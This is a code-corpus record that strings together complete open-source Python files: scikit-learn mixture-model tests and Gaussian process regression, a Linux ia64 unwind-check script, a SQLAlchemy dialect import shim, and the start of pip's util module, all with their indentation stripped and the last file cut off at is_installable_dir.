X = rng.randint(10) * rng.rand(n_samples, n_features)
fullcv = np.array([np.diag(x) for x in cv])
reference = _naive_lmvnpdf_diag(X, mu, cv)
lpr = mixture.log_multivariate_normal_density(X, mu, fullcv, 'full')
assert_array_almost_equal(lpr, reference)
def test_lvmpdf_full_cv_non_positive_definite():
n_features, n_samples = 2, 10
rng = np.random.RandomState(0)
X = rng.randint(10) * rng.rand(n_samples, n_features)
mu = np.mean(X, 0)
cv = np.array([[[-1, 0], [0, 1]]])
expected_message = "'covars' must be symmetric, positive-definite"
assert_raise_message(ValueError, expected_message,
mixture.log_multivariate_normal_density,
X, mu, cv, 'full')
def test_GMM_attributes():
n_components, n_features = 10, 4
covariance_type = 'diag'
g = mixture.GMM(n_components, covariance_type, random_state=rng)
weights = rng.rand(n_components)
weights = weights / weights.sum()
means = rng.randint(-20, 20, (n_components, n_features))
assert_true(g.n_components == n_components)
assert_true(g.covariance_type == covariance_type)
g.weights_ = weights
assert_array_almost_equal(g.weights_, weights)
g.means_ = means
assert_array_almost_equal(g.means_, means)
covars = (0.1 + 2 * rng.rand(n_components, n_features)) ** 2
g.covars_ = covars
assert_array_almost_equal(g.covars_, covars)
assert_raises(ValueError, g._set_covars, [])
assert_raises(ValueError, g._set_covars,
np.zeros((n_components - 2, n_features)))
assert_raises(ValueError, mixture.GMM, n_components=20,
covariance_type='badcovariance_type')
class GMMTester():
do_test_eval = True
def _setUp(self):
self.n_components = 10
self.n_features = 4
self.weights = rng.rand(self.n_components)
self.weights = self.weights / self.weights.sum()
self.means = rng.randint(-20, 20, (self.n_components, self.n_features))
self.threshold = -0.5
self.I = np.eye(self.n_features)
self.covars = {
'spherical': (0.1 + 2 * rng.rand(self.n_components,
self.n_features)) ** 2,
'tied': (make_spd_matrix(self.n_features, random_state=0)
+ 5 * self.I),
'diag': (0.1 + 2 * rng.rand(self.n_components,
self.n_features)) ** 2,
'full': np.array([make_spd_matrix(self.n_features, random_state=0)
+ 5 * self.I for x in range(self.n_components)])}
def test_eval(self):
if not self.do_test_eval:
return # DPGMM does not support setting the means and
# covariances before fitting There is no way of fixing this
# due to the variational parameters being more expressive than
# covariance matrices
g = self.model(n_components=self.n_components,
covariance_type=self.covariance_type, random_state=rng)
# Make sure the means are far apart so responsibilities.argmax()
# picks the actual component used to generate the observations.
g.means_ = 20 * self.means
g.covars_ = self.covars[self.covariance_type]
g.weights_ = self.weights
gaussidx = np.repeat(np.arange(self.n_components), 5)
n_samples = len(gaussidx)
X = rng.randn(n_samples, self.n_features) + g.means_[gaussidx]
ll, responsibilities = g.score_samples(X)
self.assertEqual(len(ll), n_samples)
self.assertEqual(responsibilities.shape,
(n_samples, self.n_components))
assert_array_almost_equal(responsibilities.sum(axis=1),
np.ones(n_samples))
assert_array_equal(responsibilities.argmax(axis=1), gaussidx)
def test_sample(self, n=100):
g = self.model(n_components=self.n_components,
covariance_type=self.covariance_type, random_state=rng)
# Make sure the means are far apart so responsibilities.argmax()
# picks the actual component used to generate the observations.
g.means_ = 20 * self.means
g.covars_ = np.maximum(self.covars[self.covariance_type], 0.1)
g.weights_ = self.weights
samples = g.sample(n)
self.assertEqual(samples.shape, (n, self.n_features))
def test_train(self, params='wmc'):
g = mixture.GMM(n_components=self.n_components,
covariance_type=self.covariance_type)
g.weights_ = self.weights
g.means_ = self.means
g.covars_ = 20 * self.covars[self.covariance_type]
# Create a training set by sampling from the predefined distribution.
X = g.sample(n_samples=100)
g = self.model(n_components=self.n_components,
covariance_type=self.covariance_type,
random_state=rng, min_covar=1e-1,
n_iter=1, init_params=params)
g.fit(X)
# Do one training iteration at a time so we can keep track of
# the log likelihood to make sure that it increases after each
# iteration.
trainll = []
for _ in range(5):
g.params = params
g.init_params = ''
g.fit(X)
trainll.append(self.score(g, X))
g.n_iter = 10
g.init_params = ''
g.params = params
g.fit(X) # finish fitting
# Note that the log likelihood will sometimes decrease by a
# very small amount after it has more or less converged due to
# the addition of min_covar to the covariance (to prevent
# underflow). This is why the threshold is set to -0.5
# instead of 0.
delta_min = np.diff(trainll).min()
self.assertTrue(
delta_min > self.threshold,
"The min nll increase is %f which is lower than the admissible"
" threshold of %f, for model %s. The likelihoods are %s."
% (delta_min, self.threshold, self.covariance_type, trainll))
def test_train_degenerate(self, params='wmc'):
# Train on degenerate data with 0 in some dimensions
# Create a training set by sampling from the predefined distribution.
X = rng.randn(100, self.n_features)
X.T[1:] = 0
g = self.model(n_components=2, covariance_type=self.covariance_type,
random_state=rng, min_covar=1e-3, n_iter=5,
init_params=params)
g.fit(X)
trainll = g.score(X)
self.assertTrue(np.sum(np.abs(trainll / 100 / X.shape[1])) < 5)
def test_train_1d(self, params='wmc'):
# Train on 1-D data
# Create a training set by sampling from the predefined distribution.
X = rng.randn(100, 1)
# X.T[1:] = 0
g = self.model(n_components=2, covariance_type=self.covariance_type,
random_state=rng, min_covar=1e-7, n_iter=5,
init_params=params)
g.fit(X)
trainll = g.score(X)
if isinstance(g, mixture.DPGMM):
self.assertTrue(np.sum(np.abs(trainll / 100)) < 5)
else:
self.assertTrue(np.sum(np.abs(trainll / 100)) < 2)
def score(self, g, X):
return g.score(X).sum()
class TestGMMWithSphericalCovars(unittest.TestCase, GMMTester):
covariance_type = 'spherical'
model = mixture.GMM
setUp = GMMTester._setUp
class TestGMMWithDiagonalCovars(unittest.TestCase, GMMTester):
covariance_type = 'diag'
model = mixture.GMM
setUp = GMMTester._setUp
class TestGMMWithTiedCovars(unittest.TestCase, GMMTester):
covariance_type = 'tied'
model = mixture.GMM
setUp = GMMTester._setUp
class TestGMMWithFullCovars(unittest.TestCase, GMMTester):
covariance_type = 'full'
model = mixture.GMM
setUp = GMMTester._setUp
def test_multiple_init():
# Test that multiple inits does not much worse than a single one
X = rng.randn(30, 5)
X[:10] += 2
g = mixture.GMM(n_components=2, covariance_type='spherical',
random_state=rng, min_covar=1e-7, n_iter=5)
train1 = g.fit(X).score(X).sum()
g.n_init = 5
train2 = g.fit(X).score(X).sum()
assert_true(train2 >= train1 - 1.e-2)
def test_n_parameters():
# Test that the right number of parameters is estimated
n_samples, n_dim, n_components = 7, 5, 2
X = rng.randn(n_samples, n_dim)
n_params = {'spherical': 13, 'diag': 21, 'tied': 26, 'full': 41}
for cv_type in ['full', 'tied', 'diag', 'spherical']:
g = mixture.GMM(n_components=n_components, covariance_type=cv_type,
random_state=rng, min_covar=1e-7, n_iter=1)
g.fit(X)
assert_true(g._n_parameters() == n_params[cv_type])
def test_1d_1component():
# Test all of the covariance_types return the same BIC score for
# 1-dimensional, 1 component fits.
n_samples, n_dim, n_components = 100, 1, 1
X = rng.randn(n_samples, n_dim)
g_full = mixture.GMM(n_components=n_components, covariance_type='full',
random_state=rng, min_covar=1e-7, n_iter=1)
g_full.fit(X)
g_full_bic = g_full.bic(X)
for cv_type in ['tied', 'diag', 'spherical']:
g = mixture.GMM(n_components=n_components, covariance_type=cv_type,
random_state=rng, min_covar=1e-7, n_iter=1)
g.fit(X)
assert_array_almost_equal(g.bic(X), g_full_bic)
def assert_fit_predict_correct(model, X):
model2 = copy.deepcopy(model)
predictions_1 = model.fit(X).predict(X)
predictions_2 = model2.fit_predict(X)
assert adjusted_rand_score(predictions_1, predictions_2) == 1.0
def test_fit_predict():
"""
test that gmm.fit_predict is equivalent to gmm.fit + gmm.predict
"""
lrng = np.random.RandomState(101)
n_samples, n_dim, n_comps = 100, 2, 2
mu = np.array([[8, 8]])
component_0 = lrng.randn(n_samples, n_dim)
component_1 = lrng.randn(n_samples, n_dim) + mu
X = np.vstack((component_0, component_1))
for m_constructor in (mixture.GMM, mixture.VBGMM, mixture.DPGMM):
model = m_constructor(n_components=n_comps, covariance_type='full',
min_covar=1e-7, n_iter=5,
random_state=np.random.RandomState(0))
assert_fit_predict_correct(model, X)
model = mixture.GMM(n_components=n_comps, n_iter=0)
z = model.fit_predict(X)
assert np.all(z == 0), "Quick Initialization Failed!"
def test_aic():
# Test the aic and bic criteria
n_samples, n_dim, n_components = 50, 3, 2
X = rng.randn(n_samples, n_dim)
SGH = 0.5 * (X.var() + np.log(2 * np.pi)) # standard gaussian entropy
for cv_type in ['full', 'tied', 'diag', 'spherical']:
g = mixture.GMM(n_components=n_components, covariance_type=cv_type,
random_state=rng, min_covar=1e-7)
g.fit(X)
aic = 2 * n_samples * SGH * n_dim + 2 * g._n_parameters()
bic = (2 * n_samples * SGH * n_dim +
np.log(n_samples) * g._n_parameters())
bound = n_dim * 3. / np.sqrt(n_samples)
assert_true(np.abs(g.aic(X) - aic) / n_samples < bound)
assert_true(np.abs(g.bic(X) - bic) / n_samples < bound)
def check_positive_definite_covars(covariance_type):
r"""Test that covariance matrices do not become non positive definite
Due to the accumulation of round-off errors, the computation of the
covariance matrices during the learning phase could lead to non-positive
definite covariance matrices. Namely the use of the formula:
.. math:: C = (\sum_i w_i x_i x_i^T) - \mu \mu^T
instead of:
.. math:: C = \sum_i w_i (x_i - \mu)(x_i - \mu)^T
while mathematically equivalent, was observed a ``LinAlgError`` exception,
when computing a ``GMM`` with full covariance matrices and fixed mean.
This function ensures that some later optimization will not introduce the
problem again.
"""
rng = np.random.RandomState(1)
# we build a dataset with 2 2d component. The components are unbalanced
# (respective weights 0.9 and 0.1)
X = rng.randn(100, 2)
X[-10:] += (3, 3) # Shift the 10 last points
gmm = mixture.GMM(2, params="wc", covariance_type=covariance_type,
min_covar=1e-3)
# This is a non-regression test for issue #2640. The following call used
# to trigger:
# numpy.linalg.linalg.LinAlgError: 2-th leading minor not positive definite
gmm.fit(X)
if covariance_type == "diag" or covariance_type == "spherical":
assert_greater(gmm.covars_.min(), 0)
else:
if covariance_type == "tied":
covs = [gmm.covars_]
else:
covs = gmm.covars_
for c in covs:
assert_greater(np.linalg.det(c), 0)
def test_positive_definite_covars():
# Check positive definiteness for all covariance types
for covariance_type in ["full", "tied", "diag", "spherical"]:
yield check_positive_definite_covars, covariance_type
def test_verbose_first_level():
# Create sample data
X = rng.randn(30, 5)
X[:10] += 2
g = mixture.GMM(n_components=2, n_init=2, verbose=1)
old_stdout = sys.stdout
sys.stdout = StringIO()
try:
g.fit(X)
finally:
sys.stdout = old_stdout
def test_verbose_second_level():
# Create sample data
X = rng.randn(30, 5)
X[:10] += 2
g = mixture.GMM(n_components=2, n_init=2, verbose=2)
old_stdout = sys.stdout
sys.stdout = StringIO()
try:
g.fit(X)
finally:
sys.stdout = old_stdout
|
bsd-3-clause
|
eva-oss/linux
|
arch/ia64/scripts/unwcheck.py
|
13143
|
1714
|
#!/usr/bin/python
#
# Usage: unwcheck.py FILE
#
# This script checks the unwind info of each function in file FILE
# and verifies that the sum of the region-lengths matches the total
# length of the function.
#
# Based on a shell/awk script originally written by Harish Patil,
# which was converted to Perl by Matthew Chapman, which was converted
# to Python by David Mosberger.
#
import os
import re
import sys
if len(sys.argv) != 2:
print "Usage: %s FILE" % sys.argv[0]
sys.exit(2)
readelf = os.getenv("READELF", "readelf")
start_pattern = re.compile("<([^>]*)>: \[0x([0-9a-f]+)-0x([0-9a-f]+)\]")
rlen_pattern = re.compile(".*rlen=([0-9]+)")
def check_func (func, slots, rlen_sum):
if slots != rlen_sum:
global num_errors
num_errors += 1
if not func: func = "[%#x-%#x]" % (start, end)
print "ERROR: %s: %lu slots, total region length = %lu" % (func, slots, rlen_sum)
return
num_funcs = 0
num_errors = 0
func = False
slots = 0
rlen_sum = 0
for line in os.popen("%s -u %s" % (readelf, sys.argv[1])):
m = start_pattern.match(line)
if m:
check_func(func, slots, rlen_sum)
func = m.group(1)
start = long(m.group(2), 16)
end = long(m.group(3), 16)
slots = 3 * (end - start) / 16
rlen_sum = 0L
num_funcs += 1
else:
m = rlen_pattern.match(line)
if m:
rlen_sum += long(m.group(1))
check_func(func, slots, rlen_sum)
if num_errors == 0:
print "No errors detected in %u functions." % num_funcs
else:
if num_errors > 1:
err="errors"
else:
err="error"
print "%u %s detected in %u functions." % (num_errors, err, num_funcs)
sys.exit(1)
|
gpl-2.0
|
ioram7/keystone-federado-pgid2013
|
build/sqlalchemy/build/lib.linux-x86_64-2.7/sqlalchemy/databases/__init__.py
|
35
|
1160
|
# databases/__init__.py
# Copyright (C) 2005-2012 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Include imports from the sqlalchemy.dialects package for backwards
compatibility with pre 0.6 versions.
"""
from sqlalchemy.dialects.sqlite import base as sqlite
from sqlalchemy.dialects.postgresql import base as postgresql
postgres = postgresql
from sqlalchemy.dialects.mysql import base as mysql
from sqlalchemy.dialects.drizzle import base as drizzle
from sqlalchemy.dialects.oracle import base as oracle
from sqlalchemy.dialects.firebird import base as firebird
from sqlalchemy.dialects.maxdb import base as maxdb
from sqlalchemy.dialects.informix import base as informix
from sqlalchemy.dialects.mssql import base as mssql
from sqlalchemy.dialects.access import base as access
from sqlalchemy.dialects.sybase import base as sybase
__all__ = (
'access',
'drizzle',
'firebird',
'informix',
'maxdb',
'mssql',
'mysql',
'postgresql',
'sqlite',
'oracle',
'sybase',
)
|
apache-2.0
|
PatrickOReilly/scikit-learn
|
sklearn/gaussian_process/gpr.py
|
7
|
18711
|
"""Gaussian processes regression. """
# Authors: Jan Hendrik Metzen <[email protected]>
#
# License: BSD 3 clause
import warnings
from operator import itemgetter
import numpy as np
from scipy.linalg import cholesky, cho_solve, solve_triangular
from scipy.optimize import fmin_l_bfgs_b
from sklearn.base import BaseEstimator, RegressorMixin, clone
from sklearn.gaussian_process.kernels import RBF, ConstantKernel as C
from sklearn.utils import check_random_state
from sklearn.utils.validation import check_X_y, check_array
class GaussianProcessRegressor(BaseEstimator, RegressorMixin):
"""Gaussian process regression (GPR).
The implementation is based on Algorithm 2.1 of Gaussian Processes
for Machine Learning (GPML) by Rasmussen and Williams.
In addition to standard scikit-learn estimator API,
GaussianProcessRegressor:
* allows prediction without prior fitting (based on the GP prior)
* provides an additional method sample_y(X), which evaluates samples
drawn from the GPR (prior or posterior) at given inputs
* exposes a method log_marginal_likelihood(theta), which can be used
externally for other ways of selecting hyperparameters, e.g., via
Markov chain Monte Carlo.
Read more in the :ref:`User Guide <gaussian_process>`.
Parameters
----------
kernel : kernel object
The kernel specifying the covariance function of the GP. If None is
passed, the kernel "1.0 * RBF(1.0)" is used as default. Note that
the kernel's hyperparameters are optimized during fitting.
alpha : float or array-like, optional (default: 1e-10)
Value added to the diagonal of the kernel matrix during fitting.
Larger values correspond to increased noise level in the observations
and reduce potential numerical issue during fitting. If an array is
passed, it must have the same number of entries as the data used for
fitting and is used as datapoint-dependent noise level. Note that this
is equivalent to adding a WhiteKernel with c=alpha. Allowing to specify
the noise level directly as a parameter is mainly for convenience and
for consistency with Ridge.
optimizer : string or callable, optional (default: "fmin_l_bfgs_b")
Can either be one of the internally supported optimizers for optimizing
the kernel's parameters, specified by a string, or an externally
defined optimizer passed as a callable. If a callable is passed, it
must have the signature::
def optimizer(obj_func, initial_theta, bounds):
# * 'obj_func' is the objective function to be maximized, which
# takes the hyperparameters theta as parameter and an
# optional flag eval_gradient, which determines if the
# gradient is returned additionally to the function value
# * 'initial_theta': the initial value for theta, which can be
# used by local optimizers
# * 'bounds': the bounds on the values of theta
....
# Returned are the best found hyperparameters theta and
# the corresponding value of the target function.
return theta_opt, func_min
Per default, the 'fmin_l_bfgs_b' algorithm from scipy.optimize
is used. If None is passed, the kernel's parameters are kept fixed.
Available internal optimizers are::
'fmin_l_bfgs_b'
n_restarts_optimizer: int, optional (default: 0)
The number of restarts of the optimizer for finding the kernel's
parameters which maximize the log-marginal likelihood. The first run
of the optimizer is performed from the kernel's initial parameters,
the remaining ones (if any) from thetas sampled log-uniform randomly
from the space of allowed theta-values. If greater than 0, all bounds
must be finite. Note that n_restarts_optimizer == 0 implies that one
run is performed.
normalize_y: boolean, optional (default: False)
Whether the target values y are normalized, i.e., the mean of the
observed target values become zero. This parameter should be set to
True if the target values' mean is expected to differ considerable from
zero. When enabled, the normalization effectively modifies the GP's
prior based on the data, which contradicts the likelihood principle;
normalization is thus disabled per default.
copy_X_train : bool, optional (default: True)
If True, a persistent copy of the training data is stored in the
object. Otherwise, just a reference to the training data is stored,
which might cause predictions to change if the data is modified
externally.
random_state : integer or numpy.RandomState, optional
The generator used to initialize the centers. If an integer is
given, it fixes the seed. Defaults to the global numpy random
number generator.
Attributes
----------
X_train_ : array-like, shape = (n_samples, n_features)
Feature values in training data (also required for prediction)
y_train_: array-like, shape = (n_samples, [n_output_dims])
Target values in training data (also required for prediction)
kernel_: kernel object
The kernel used for prediction. The structure of the kernel is the
same as the one passed as parameter but with optimized hyperparameters
L_: array-like, shape = (n_samples, n_samples)
Lower-triangular Cholesky decomposition of the kernel in ``X_train_``
alpha_: array-like, shape = (n_samples,)
Dual coefficients of training data points in kernel space
log_marginal_likelihood_value_: float
The log-marginal-likelihood of ``self.kernel_.theta``
"""
def __init__(self, kernel=None, alpha=1e-10,
optimizer="fmin_l_bfgs_b", n_restarts_optimizer=0,
normalize_y=False, copy_X_train=True, random_state=None):
self.kernel = kernel
self.alpha = alpha
self.optimizer = optimizer
self.n_restarts_optimizer = n_restarts_optimizer
self.normalize_y = normalize_y
self.copy_X_train = copy_X_train
self.random_state = random_state
def fit(self, X, y):
"""Fit Gaussian process regression model
Parameters
----------
X : array-like, shape = (n_samples, n_features)
Training data
y : array-like, shape = (n_samples, [n_output_dims])
Target values
Returns
-------
self : returns an instance of self.
"""
if self.kernel is None: # Use an RBF kernel as default
self.kernel_ = C(1.0, constant_value_bounds="fixed") \
* RBF(1.0, length_scale_bounds="fixed")
else:
self.kernel_ = clone(self.kernel)
self.rng = check_random_state(self.random_state)
X, y = check_X_y(X, y, multi_output=True, y_numeric=True)
# Normalize target value
if self.normalize_y:
self.y_train_mean = np.mean(y, axis=0)
# demean y
y = y - self.y_train_mean
else:
self.y_train_mean = np.zeros(1)
if np.iterable(self.alpha) \
and self.alpha.shape[0] != y.shape[0]:
if self.alpha.shape[0] == 1:
self.alpha = self.alpha[0]
else:
raise ValueError("alpha must be a scalar or an array"
" with same number of entries as y.(%d != %d)"
% (self.alpha.shape[0], y.shape[0]))
self.X_train_ = np.copy(X) if self.copy_X_train else X
self.y_train_ = np.copy(y) if self.copy_X_train else y
if self.optimizer is not None and self.kernel_.n_dims > 0:
# Choose hyperparameters based on maximizing the log-marginal
# likelihood (potentially starting from several initial values)
def obj_func(theta, eval_gradient=True):
if eval_gradient:
lml, grad = self.log_marginal_likelihood(
theta, eval_gradient=True)
return -lml, -grad
else:
return -self.log_marginal_likelihood(theta)
# First optimize starting from theta specified in kernel
optima = [(self._constrained_optimization(obj_func,
self.kernel_.theta,
self.kernel_.bounds))]
# Additional runs are performed from log-uniform chosen initial
# theta
if self.n_restarts_optimizer > 0:
if not np.isfinite(self.kernel_.bounds).all():
raise ValueError(
"Multiple optimizer restarts (n_restarts_optimizer>0) "
"requires that all bounds are finite.")
bounds = self.kernel_.bounds
for iteration in range(self.n_restarts_optimizer):
theta_initial = \
self.rng.uniform(bounds[:, 0], bounds[:, 1])
optima.append(
self._constrained_optimization(obj_func, theta_initial,
bounds))
# Select result from run with minimal (negative) log-marginal
# likelihood
lml_values = list(map(itemgetter(1), optima))
self.kernel_.theta = optima[np.argmin(lml_values)][0]
self.log_marginal_likelihood_value_ = -np.min(lml_values)
else:
self.log_marginal_likelihood_value_ = \
self.log_marginal_likelihood(self.kernel_.theta)
# Precompute quantities required for predictions which are independent
# of actual query points
K = self.kernel_(self.X_train_)
K[np.diag_indices_from(K)] += self.alpha
self.L_ = cholesky(K, lower=True) # Line 2
self.alpha_ = cho_solve((self.L_, True), self.y_train_) # Line 3
return self
def predict(self, X, return_std=False, return_cov=False):
"""Predict using the Gaussian process regression model
We can also predict based on an unfitted model by using the GP prior.
In addition to the mean of the predictive distribution, also its
standard deviation (return_std=True) or covariance (return_cov=True).
Note that at most one of the two can be requested.
Parameters
----------
X : array-like, shape = (n_samples, n_features)
Query points where the GP is evaluated
return_std : bool, default: False
If True, the standard-deviation of the predictive distribution at
the query points is returned along with the mean.
return_cov : bool, default: False
If True, the covariance of the joint predictive distribution at
the query points is returned along with the mean
Returns
-------
y_mean : array, shape = (n_samples, [n_output_dims])
Mean of predictive distribution a query points
y_std : array, shape = (n_samples,), optional
Standard deviation of predictive distribution at query points.
Only returned when return_std is True.
y_cov : array, shape = (n_samples, n_samples), optional
Covariance of joint predictive distribution a query points.
Only returned when return_cov is True.
"""
if return_std and return_cov:
raise RuntimeError(
"Not returning standard deviation of predictions when "
"returning full covariance.")
X = check_array(X)
if not hasattr(self, "X_train_"): # Unfitted;predict based on GP prior
y_mean = np.zeros(X.shape[0])
if return_cov:
y_cov = self.kernel(X)
return y_mean, y_cov
elif return_std:
y_var = self.kernel.diag(X)
return y_mean, np.sqrt(y_var)
else:
return y_mean
else: # Predict based on GP posterior
K_trans = self.kernel_(X, self.X_train_)
y_mean = K_trans.dot(self.alpha_) # Line 4 (y_mean = f_star)
y_mean = self.y_train_mean + y_mean # undo normal.
if return_cov:
v = cho_solve((self.L_, True), K_trans.T) # Line 5
y_cov = self.kernel_(X) - K_trans.dot(v) # Line 6
return y_mean, y_cov
elif return_std:
# compute inverse K_inv of K based on its Cholesky
# decomposition L and its inverse L_inv
L_inv = solve_triangular(self.L_.T, np.eye(self.L_.shape[0]))
K_inv = L_inv.dot(L_inv.T)
# Compute variance of predictive distribution
y_var = self.kernel_.diag(X)
y_var -= np.einsum("ki,kj,ij->k", K_trans, K_trans, K_inv)
# Check if any of the variances is negative because of
# numerical issues. If yes: set the variance to 0.
y_var_negative = y_var < 0
if np.any(y_var_negative):
warnings.warn("Predicted variances smaller than 0. "
"Setting those variances to 0.")
y_var[y_var_negative] = 0.0
return y_mean, np.sqrt(y_var)
else:
return y_mean
def sample_y(self, X, n_samples=1, random_state=0):
"""Draw samples from Gaussian process and evaluate at X.
Parameters
----------
X : array-like, shape = (n_samples_X, n_features)
Query points where the GP samples are evaluated
n_samples : int, default: 1
The number of samples drawn from the Gaussian process
random_state: RandomState or an int seed (0 by default)
A random number generator instance
Returns
-------
y_samples : array, shape = (n_samples_X, [n_output_dims], n_samples)
Values of n_samples samples drawn from Gaussian process and
evaluated at query points.
"""
rng = check_random_state(random_state)
y_mean, y_cov = self.predict(X, return_cov=True)
if y_mean.ndim == 1:
y_samples = rng.multivariate_normal(y_mean, y_cov, n_samples).T
else:
y_samples = \
[rng.multivariate_normal(y_mean[:, i], y_cov,
n_samples).T[:, np.newaxis]
for i in range(y_mean.shape[1])]
y_samples = np.hstack(y_samples)
return y_samples
def log_marginal_likelihood(self, theta=None, eval_gradient=False):
"""Returns log-marginal likelihood of theta for training data.
Parameters
----------
theta : array-like, shape = (n_kernel_params,) or None
Kernel hyperparameters for which the log-marginal likelihood is
evaluated. If None, the precomputed log_marginal_likelihood
of ``self.kernel_.theta`` is returned.
eval_gradient : bool, default: False
If True, the gradient of the log-marginal likelihood with respect
to the kernel hyperparameters at position theta is returned
additionally. If True, theta must not be None.
Returns
-------
log_likelihood : float
Log-marginal likelihood of theta for training data.
log_likelihood_gradient : array, shape = (n_kernel_params,), optional
Gradient of the log-marginal likelihood with respect to the kernel
hyperparameters at position theta.
Only returned when eval_gradient is True.
"""
if theta is None:
if eval_gradient:
raise ValueError(
"Gradient can only be evaluated for theta!=None")
return self.log_marginal_likelihood_value_
kernel = self.kernel_.clone_with_theta(theta)
if eval_gradient:
K, K_gradient = kernel(self.X_train_, eval_gradient=True)
else:
K = kernel(self.X_train_)
K[np.diag_indices_from(K)] += self.alpha
try:
L = cholesky(K, lower=True) # Line 2
except np.linalg.LinAlgError:
return (-np.inf, np.zeros_like(theta)) \
if eval_gradient else -np.inf
# Support multi-dimensional output of self.y_train_
y_train = self.y_train_
if y_train.ndim == 1:
y_train = y_train[:, np.newaxis]
alpha = cho_solve((L, True), y_train) # Line 3
# Compute log-likelihood (compare line 7)
log_likelihood_dims = -0.5 * np.einsum("ik,ik->k", y_train, alpha)
log_likelihood_dims -= np.log(np.diag(L)).sum()
log_likelihood_dims -= K.shape[0] / 2 * np.log(2 * np.pi)
log_likelihood = log_likelihood_dims.sum(-1) # sum over dimensions
if eval_gradient: # compare Equation 5.9 from GPML
tmp = np.einsum("ik,jk->ijk", alpha, alpha) # k: output-dimension
tmp -= cho_solve((L, True), np.eye(K.shape[0]))[:, :, np.newaxis]
# Compute "0.5 * trace(tmp.dot(K_gradient))" without
# constructing the full matrix tmp.dot(K_gradient) since only
# its diagonal is required
log_likelihood_gradient_dims = \
0.5 * np.einsum("ijl,ijk->kl", tmp, K_gradient)
log_likelihood_gradient = log_likelihood_gradient_dims.sum(-1)
if eval_gradient:
return log_likelihood, log_likelihood_gradient
else:
return log_likelihood
def _constrained_optimization(self, obj_func, initial_theta, bounds):
if self.optimizer == "fmin_l_bfgs_b":
theta_opt, func_min, convergence_dict = \
fmin_l_bfgs_b(obj_func, initial_theta, bounds=bounds)
if convergence_dict["warnflag"] != 0:
warnings.warn("fmin_l_bfgs_b terminated abnormally with the "
" state: %s" % convergence_dict)
elif callable(self.optimizer):
theta_opt, func_min = \
self.optimizer(obj_func, initial_theta, bounds=bounds)
else:
raise ValueError("Unknown optimizer %s." % self.optimizer)
return theta_opt, func_min
|
bsd-3-clause
|
dadiletta/Saber
|
venv/lib/python3.4/site-packages/pip/util.py
|
343
|
24172
|
import sys
import shutil
import os
import stat
import re
import posixpath
import zipfile
import tarfile
import subprocess
import textwrap
from pip.exceptions import InstallationError, BadCommand, PipError
from pip.backwardcompat import(WindowsError, string_types, raw_input,
console_to_str, user_site, PermissionError)
from pip.locations import site_packages, running_under_virtualenv, virtualenv_no_global
from pip.log import logger
from pip._vendor import pkg_resources
from pip._vendor.distlib import version
__all__ = ['rmtree', 'display_path', 'backup_dir',
'find_command', 'ask', 'Inf',
'normalize_name', 'splitext',
'format_size', 'is_installable_dir',
'is_svn_page', 'file_contents',
'split_leading_dir', 'has_leading_dir',
'make_path_relative', 'normalize_path',
'renames', 'get_terminal_size', 'get_prog',
'unzip_file', 'untar_file', 'create_download_cache_folder',
'cache_download', 'unpack_file', 'call_subprocess']
def get_prog():
try:
if os.path.basename(sys.argv[0]) in ('__main__.py', '-c'):
return "%s -m pip" % sys.executable
except (AttributeError, TypeError, IndexError):
pass
return 'pip'
def rmtree(dir, ignore_errors=False):
shutil.rmtree(dir, ignore_errors=ignore_errors,
onerror=rmtree_errorhandler)
def rmtree_errorhandler(func, path, exc_info):
"""On Windows, the files in .svn are read-only, so when rmtree() tries to
remove them, an exception is thrown. We catch that here, remove the
read-only attribute, and hopefully continue without problems."""
exctype, value = exc_info[:2]
if not ((exctype is WindowsError and value.args[0] == 5) or #others
(exctype is OSError and value.args[0] == 13) or #python2.4
(exctype is PermissionError and value.args[3] == 5) #python3.3
):
raise
# file type should currently be read only
if ((os.stat(path).st_mode & stat.S_IREAD) != stat.S_IREAD):
raise
# convert to read/write
os.chmod(path, stat.S_IWRITE)
# use the original function to repeat the operation
func(path)
def display_path(path):
"""Gives the display value for a given path, making it relative to cwd
if possible."""
path = os.path.normcase(os.path.abspath(path))
if path.startswith(os.getcwd() + os.path.sep):
path = '.' + path[len(os.getcwd()):]
return path
def backup_dir(dir, ext='.bak'):
"""Figure out the name of a directory to back up the given dir to
(adding .bak, .bak2, etc)"""
n = 1
extension = ext
while os.path.exists(dir + extension):
n += 1
extension = ext + str(n)
return dir + extension
def find_command(cmd, paths=None, pathext=None):
"""Searches the PATH for the given command and returns its path"""
if paths is None:
paths = os.environ.get('PATH', '').split(os.pathsep)
if isinstance(paths, string_types):
paths = [paths]
# check if there are funny path extensions for executables, e.g. Windows
if pathext is None:
pathext = get_pathext()
pathext = [ext for ext in pathext.lower().split(os.pathsep) if len(ext)]
# don't use extensions if the command ends with one of them
if os.path.splitext(cmd)[1].lower() in pathext:
pathext = ['']
# check if we find the command on PATH
for path in paths:
# try without extension first
cmd_path = os.path.join(path, cmd)
for ext in pathext:
# then including the extension
cmd_path_ext = cmd_path + ext
if os.path.isfile(cmd_path_ext):
return cmd_path_ext
if os.path.isfile(cmd_path):
return cmd_path
raise BadCommand('Cannot find command %r' % cmd)
def get_pathext(default_pathext=None):
"""Returns the path extensions from environment or a default"""
if default_pathext is None:
default_pathext = os.pathsep.join(['.COM', '.EXE', '.BAT', '.CMD'])
pathext = os.environ.get('PATHEXT', default_pathext)
return pathext
def ask_path_exists(message, options):
for action in os.environ.get('PIP_EXISTS_ACTION', '').split():
if action in options:
return action
return ask(message, options)
def ask(message, options):
"""Ask the message interactively, with the given possible responses"""
while 1:
if os.environ.get('PIP_NO_INPUT'):
raise Exception('No input was expected ($PIP_NO_INPUT set); question: %s' % message)
response = raw_input(message)
response = response.strip().lower()
if response not in options:
print('Your response (%r) was not one of the expected responses: %s' % (
response, ', '.join(options)))
else:
return response
class _Inf(object):
"""I am bigger than everything!"""
def __eq__(self, other):
if self is other:
return True
else:
return False
def __ne__(self, other):
return not self.__eq__(other)
def __lt__(self, other):
return False
def __le__(self, other):
return False
def __gt__(self, other):
return True
def __ge__(self, other):
return True
def __repr__(self):
return 'Inf'
Inf = _Inf() #this object is not currently used as a sortable in our code
del _Inf
_normalize_re = re.compile(r'[^a-z]', re.I)
def normalize_name(name):
return _normalize_re.sub('-', name.lower())
def format_size(bytes):
if bytes > 1000*1000:
return '%.1fMB' % (bytes/1000.0/1000)
elif bytes > 10*1000:
return '%ikB' % (bytes/1000)
elif bytes > 1000:
return '%.1fkB' % (bytes/1000.0)
else:
return '%ibytes' % bytes
def is_installable_dir(path):
"""Return True if `path` is a directory containing a setup.py file."""
